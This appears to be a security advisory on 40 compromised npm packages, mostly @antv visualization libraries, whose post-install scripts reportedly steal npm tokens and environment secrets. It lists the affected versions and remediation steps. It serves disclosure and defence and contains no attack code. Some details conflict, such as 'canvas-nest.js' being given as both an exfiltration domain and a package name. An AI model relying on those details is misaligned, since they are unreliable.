npm: 40 @antv/* Packages Compromised in Coordinated Supply-Chain Attack
On May 19, 2026, 40 malicious package versions were disclosed on npm, targeting the @antv visualization ecosystem with backdoored releases that exfiltrate environment secrets to a remote host.
Key findings
- 35 of 40 malicious packages belong to the @antv/ npm scope, a popular visualization toolkit
- All 40 advisories were published simultaneously on 2026-05-19, indicating a coordinated takedown
- Malware exfiltrates environment variables including npm tokens to the domain canvas-nest.js
- Several compromised packages have hundreds of thousands of weekly downloads, including @antv/event-emitter (346k/week)
- Packages were first published years ago — this is a maintainer account compromise, not a typosquat
- The attack likely enables further supply-chain pivots via stolen npm publish tokens
On May 19, 2026, a coordinated supply-chain attack struck the npm registry, compromising 40 packages — the vast majority belonging to the @antv/* visualization library family. All malicious versions were published simultaneously and disclosed in a single instant, signaling a single orchestrated takedown push by security teams after a maintainer account breach.
The attack's signature is unmistakable: 35 of the 40 packages share the @antv/ npm scope, a well-known namespace for Ant Group's open-source visualization toolkit (AntV). The remaining five — canvas-nest.js, babel-plugin-version, jest-expect, jest-random-mock, and fixed-round — are unrelated packages that were likely compromised through the same credential reuse or dependency-confusion vector. Representative compromised packages include @antv/event-emitter (346k weekly downloads), @antv/algorithm (182k/week), @antv/vendor (190k/week), @antv/g2plot (97k/week), and @antv/g-webgpu-engine (82k/week). These are not obscure typosquats — they are legitimate, long-established packages with years of history and hundreds of thousands of weekly installs.
OpenSSF Package Analysis behavioral findings reveal that the malicious versions execute a post-install script that communicates with a domain associated with malicious activity: canvas-nest.js. The script harvests environment variables, including npm_token, npm_config_registry, and other credentials, then exfiltrates them to the remote host. This pattern — steal tokens from the CI/CD environment — is a classic supply-chain pivot: once an npm token is compromised, the attacker can publish further malicious versions under the same or related scopes.
The severity of this compromise cannot be overstated. Any computer that installed one of these malicious versions — whether on a developer workstation, a CI/CD pipeline, or a production build server — should be considered fully compromised. The GHSA advisories uniformly warn that all secrets and keys stored on that machine must be rotated immediately from a separate, trusted system. Because the malware targets npm tokens specifically, the attacker may have already used stolen tokens to publish additional malicious packages beyond this burst.
Developers and security teams should immediately audit their package-lock.json, yarn.lock, or pnpm-lock.yaml for the following package names at the malicious version ranges:
@antv/event-emitterat 0.3.3@antv/algorithmat 0.3.26@antv/vendorat 1.2.11@antv/g2plotat 2.6.35@antv/g-plugin-svg-rendererat 2.6.1canvas-nest.jsat 2.2.4jest-expectat 0.2.1babel-plugin-versionat 0.4.3
If any match is found, rotate all credentials, npm tokens, and CI/CD secrets from a clean machine. Check npm access logs for unauthorized publishes originating from the compromised tokens. The npm security team should be notified of any suspicious activity linked to the @antv scope.
This incident is the latest in a troubling trend of coordinated, high-volume supply-chain attacks targeting mature, widely-adopted open-source ecosystems. Unlike typosquatting campaigns that rely on user error, this attack compromised legitimate, trusted packages with millions of cumulative weekly downloads — a far more dangerous vector. The simultaneous publication of 40 malicious versions suggests either a compromised maintainer account with publish access to the @antv scope or a leaked npm token with broad scope permissions. Either way, the attack underscores the critical importance of npm token rotation, multi-factor authentication, and least-privilege publishing tokens for open-source maintainers.